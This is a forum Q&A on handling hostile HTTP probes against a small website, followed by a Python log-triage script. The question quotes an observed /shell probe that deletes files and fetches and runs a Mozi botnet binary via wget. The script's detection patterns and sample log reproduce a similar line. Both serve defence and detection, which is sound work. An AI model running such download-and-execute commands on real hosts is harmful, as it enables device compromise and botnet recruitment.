What to do with hacker http requests?
I have a small site, and lately various HTTP requests unrelated to the site's content have started coming to it, for example:
get wp-login.php
get /gponform/diag_form?images/
get /shell?cd+/tmp;rm+-rf+*;wget+ 192.168.1.1:8088/mozi.a;chmod+777+mozi.a;/tmp/mozi ...
Ignore it: you can't ban everyone, but if you try, you can end up banning real users.
Well, just do not leave such vulnerabilities.
A WAF will help you. Bans by IP / region are like blocking /8 networks when trying to block Telegram.
In short - you hide behind a CDN (CloudFront, for example) and set up AWS WAF inspection on it - 95% of all hacking attempts will be shut out.
The remaining 5% will be much more expensive to shut out; it all depends on how much money would be lost from site downtime.
Decide on the target audience. If it is the Russian Federation, then we do not need access from other countries and we can safely ban the subnets of America, etc.
At least ban the subnets of China; the most inadequate requests constantly come from there.
You can also add known Tor exit nodes to the ban list. Add Amazon servers and the like to the ban list too.
The volume of garbage will drop significantly; the main thing is not to ban someone you need)))
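The answers above come down to two checks an operator can run on the access log: which clients repeatedly send probes like the ones in the question, and whether any probe got something other than a 4xx response. This is an added example, not code from the thread; it assumes combined-format log lines, and the sample lines, rule names and `min_hits` threshold are constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Combined-log-format prefix: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# Probe families modelled on the three requests quoted in the question.
RULES = [
    ("cms-login-probe", re.compile(r"/wp-login\.php", re.I)),
    ("router-form-probe", re.compile(r"/gponform/diag_form", re.I)),
    # A shell separator followed by a command name, not just the word "wget".
    ("shell-command-probe", re.compile(r"[;|&`$]\s*(?:cd|rm|wget|curl|chmod)\b", re.I)),
]

def classify(target):
    """Return the probe family for a request target, or None for normal traffic."""
    decoded = unquote_plus(target)  # '+' and %xx hide spaces and separators
    for name, rx in RULES:
        if rx.search(decoded):
            return name
    return None

def triage(lines, min_hits=2):
    """Return (repeat offenders by IP, probes that were not answered with 4xx)."""
    hits, answered = defaultdict(Counter), []
    for line in lines:
        m = LOG_RE.match(line)
        family = classify(m["target"]) if m else None
        if family is None:
            continue
        hits[m["ip"]][family] += 1
        if not m["status"].startswith("4"):  # a probe that "worked" needs a look
            answered.append((m["ip"], family, int(m["status"])))
    repeat = {ip: dict(c) for ip, c in hits.items() if sum(c.values()) >= min_hits}
    return repeat, answered

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /wp-login.php HTTP/1.1" 404 153',
    '203.0.113.7 - - [10/Jan/2024:10:00:02 +0000] "GET /gponform/diag_form?images/ HTTP/1.1" 404 153',
    '198.51.100.23 - - [10/Jan/2024:10:03:10 +0000] '
    '"GET /shell?cd+/tmp;rm+-rf+*;wget+192.0.2.10:8088/sample.bin HTTP/1.1" 200 512',
    '192.0.2.44 - - [10/Jan/2024:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    repeat, answered = triage(SAMPLE)
    print("repeat probers:", repeat)
    print("probes not rejected:", answered)
```

Probes that all end in 404 are background noise; an entry in the second list means the server answered a path it should not have, which is the case worth investigating before any ban list.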